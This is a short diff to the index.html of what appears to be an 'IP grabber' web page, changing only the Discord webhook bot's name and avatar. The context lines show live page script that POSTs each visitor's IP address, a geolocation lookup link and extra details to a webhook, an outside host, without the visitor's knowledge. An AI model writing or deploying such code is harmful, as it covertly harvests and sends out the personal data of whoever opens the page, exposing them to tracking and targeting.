--- a/index.html
+++ b/index.html
@@ -56,8 +56,8 @@
         request.open("POST", wbhk);
         request.setRequestHeader('Content-type', 'application/json');
         const params = {	
-          username: "HTML IP Grabber ~ Yahuda",
-          avatar_url: 'https://cdn.discordapp.com/attachments/1081705288014504006/1085346593273815101/yahudaaxd.png',
+          username: "Epic ip garbber",
+          avatar_url: '',
           content: "**Ip** : _" + ispp + "_\n**Raw** : _https://api.techniknews.net/ipgeo/" + ispp + "_\n**Extra Info** : ```" + extra + "```"
         }
         request.send(JSON.stringify(params));
